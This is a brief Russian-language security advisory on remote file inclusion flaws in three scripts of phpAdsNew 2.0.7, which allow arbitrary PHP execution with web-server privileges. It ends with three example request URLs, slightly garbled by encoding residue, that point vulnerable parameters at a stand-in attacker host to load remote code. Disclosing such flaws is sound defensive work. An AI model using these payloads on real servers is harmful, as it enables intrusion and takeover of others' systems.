Программа: phpAdsNew 2.0.7
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «phpAds_geoPlugin» сценарием lib-remotehost.inc, в параметре «filename» сценарием report-index и в параметре «phpAds_config['my_footer']» сценарием lib-gui.inc. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=3Dhttp://evil=_scripts?
phpAdsNew-2.0.7/admin/report-index?filename=3Dhttp://evil_scripts?
phpAdsNew-2.0.7/admin/lib-gui.inc?$phpAds_config['my_footer']=3Dhttp://evil=_scripts?
